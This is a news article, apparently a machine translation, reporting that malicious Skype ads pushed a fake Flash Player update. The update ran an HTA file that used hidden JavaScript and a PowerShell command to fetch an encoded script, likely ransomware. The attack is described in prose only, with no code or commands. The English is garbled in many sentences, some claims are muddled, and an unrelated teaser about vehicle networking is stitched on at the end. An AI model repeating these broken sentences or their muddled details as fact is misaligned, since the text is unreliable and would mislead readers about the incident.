Malvertising: Listings in Skype spread malicious software

users report of fake advertisements in the Skype app, which can lead to Ransomware infections. The Malvertising ads are pushing for an urgent update for Adobe Flash player – but a careless click causes instead actually a multistage attack. On request Microsoft wanted to give no opinion to do so.

a concerned user first described on reddit and occupied with a screenshot, as him on the Skype homescreen met such a malicious ad and called to execute a file called “FlashPlayer.hta”. Another user complained in the following days about similar incidents with Skype’s in-app ads partly also promoting an alleged Flash update.

(Bild: Reddit / j8048188)

ZDNet.com asked experts to examine the isolated code and explain how it works. The fake Flash advertisement was designed for Windows computers and launched a download, which will execute should trigger a hidden JavaScript. Your code should then delete the application just opened by the user and run a PowerShell command, to download a JavaScript encoded script (JSE).

these successive steps were apparently used to avoid detection by antivirus-malware. “This is what is commonly called a two-step dropper”, said Ali-Reza Anghaie by the security firm Phobos group. “It’s practically a helper component of the malware, which then decides whether further steps – depending on of the command and Kontollserver, with which it connects.” He also assumed that was to be expected in 99 per cent of all cases Ransomware, which encrypts the computer and then blackmails the user. Signs are that while the Exploitkit is angler used, seen already in previous Malvertising campaigns .

the domain, the more download should be done by the, existed but no longer, so download and further analysis of the actual malware codes were no longer possible. Attackers who constantly change the domains, to cover their tracks are apparently behind the fake advertising. A further domain found in a fake-Flash ad that has been uploaded by to IBM’s X-Force Security Department. BleepingComputer two used domains noted that they were registered via E-Mail addresses that were used for the registration of a number of other dubious domains that were associated with malware.

it is also not the first time that Skype through Malvertising is striking. So, Threatpost reported advertisements delivered by 2015 by the Skype client, which served the distribution of malicious software. 2016, security researchers encountered malicious ads that their objective attacks with the Exploitkit anglers, often transported ransomware.

[withmaterialbyZackWhittaker ZDNet.com ]

display

wireless networking: free ride for vehicles of the next generation of

has become the networking of vehicles over the last 20 years to a medium for general safety messages and traffic management. But nowadays cars are equipped with new sensors to achieve even better networked and safer driving.

Be the first to comment

Leave a Reply